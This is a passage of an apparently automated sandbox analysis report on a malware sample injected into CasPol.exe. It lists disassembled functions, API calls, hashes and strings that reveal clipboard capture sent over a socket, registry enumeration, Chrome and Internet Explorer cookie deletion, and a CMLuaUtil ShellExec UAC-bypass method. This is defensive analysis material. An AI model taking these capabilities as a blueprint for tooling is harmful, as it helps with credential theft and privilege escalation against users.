                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InputSend$Virtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1167301434-0
                                                                                                                                                              • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                              • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                                                                                              • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                              • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                                                                                              APIs
                                                                                                                                                              • OpenClipboard.USER32 ref: 00415A46
                                                                                                                                                              • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(000002D4,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2172192267-0
                                                                                                                                                              • Opcode ID: a4bc90c7b42ad257af3d3a405f0387b9fe529ea6a62e82e0e8fb23c7bb9faa15
                                                                                                                                                              • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                                                                              • Opcode Fuzzy Hash: a4bc90c7b42ad257af3d3a405f0387b9fe529ea6a62e82e0e8fb23c7bb9faa15
                                                                                                                                                              • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                              • Opcode ID: 6e270e3566a57228008d5882711c0e5bb0e0dd5acca1278b8e6f8f313ed3fb9f
                                                                                                                                                              • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                                                                              • Opcode Fuzzy Hash: 6e270e3566a57228008d5882711c0e5bb0e0dd5acca1278b8e6f8f313ed3fb9f
                                                                                                                                                              • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                                              • _free.LIBCMT ref: 00444086
                                                                                                                                                              • _free.LIBCMT ref: 0044409D
                                                                                                                                                              • _free.LIBCMT ref: 004440BC
                                                                                                                                                              • _free.LIBCMT ref: 004440D7
                                                                                                                                                              • _free.LIBCMT ref: 004440EE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$AllocateHeap
                                                                                                                                                              • String ID: J7D
                                                                                                                                                              • API String ID: 3033488037-1677391033
                                                                                                                                                              • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                                                                              • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                                                                              • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                                                                              • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                                                                              APIs
                                                                                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                                                                                              • __fassign.LIBCMT ref: 0044A180
                                                                                                                                                              • __fassign.LIBCMT ref: 0044A19B
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                              • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                              • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                                                                              • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                              • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                                                                              APIs
                                                                                                                                                              • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                              • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                              • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100095AF
                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 100095E8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                              • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                              • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                              • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                              • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                                                                • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(000002D4,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                              • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                              • String ID: TUFTUF$>G$DG$DG
                                                                                                                                                              • API String ID: 3114080316-344394840
                                                                                                                                                              • Opcode ID: c7dacded70064eff084c5483823ad627ae37bda4e5083f92a4c54b5f216bc74c
                                                                                                                                                              • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                                                                              • Opcode Fuzzy Hash: c7dacded70064eff084c5483823ad627ae37bda4e5083f92a4c54b5f216bc74c
                                                                                                                                                              • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                                                              APIs
                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                              • String ID: csm
                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                              • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                                                              • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                                                                              • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                                                              • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                                                                              APIs
                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                              • String ID: csm
                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                              • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                              • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                              • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                              • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                              • API String ID: 1133728706-4073444585
                                                                                                                                                              • Opcode ID: 9f830491a43924aacef6b89cd49d596dbc1a7be0786a055df37cbe98fa0b0cad
                                                                                                                                                              • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                                                                              • Opcode Fuzzy Hash: 9f830491a43924aacef6b89cd49d596dbc1a7be0786a055df37cbe98fa0b0cad
                                                                                                                                                              • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                                                                                                              • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                                                                              • Opcode Fuzzy Hash: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                                                                                                              • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                                                                              APIs
                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                                                                              • int.LIBCPMT ref: 0040FC0F
                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                              • String ID: P[G
                                                                                                                                                              • API String ID: 2536120697-571123470
                                                                                                                                                              • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                                                                              • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                                                                              • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                                                                              • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                                                                              • _free.LIBCMT ref: 0044FD29
                                                                                                                                                                • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                                              • _free.LIBCMT ref: 0044FD34
                                                                                                                                                              • _free.LIBCMT ref: 0044FD3F
                                                                                                                                                              • _free.LIBCMT ref: 0044FD93
                                                                                                                                                              • _free.LIBCMT ref: 0044FD9E
                                                                                                                                                              • _free.LIBCMT ref: 0044FDA9
                                                                                                                                                              • _free.LIBCMT ref: 0044FDB4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                              • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                              • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                                                                              • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                              • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                              • _free.LIBCMT ref: 100092AB
                                                                                                                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                              • _free.LIBCMT ref: 100092B6
                                                                                                                                                              • _free.LIBCMT ref: 100092C1
                                                                                                                                                              • _free.LIBCMT ref: 10009315
                                                                                                                                                              • _free.LIBCMT ref: 10009320
                                                                                                                                                              • _free.LIBCMT ref: 1000932B
                                                                                                                                                              • _free.LIBCMT ref: 10009336
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                              • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                              • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                              • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                              • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                              APIs
                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
                                                                                                                                                                • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                              • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                              • API String ID: 3851391207-2637227304
                                                                                                                                                              • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                                                              • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                                                              • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                                                              • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                                                              APIs
                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                                                              • int.LIBCPMT ref: 0040FEF2
                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                              • String ID: H]G
                                                                                                                                                              • API String ID: 2536120697-1717957184
                                                                                                                                                              • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                                                                              • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                                                                              • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                                                                              • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                                                                              APIs
                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                                                              Strings
                                                                                                                                                              • UserProfile, xrefs: 0040B2B4
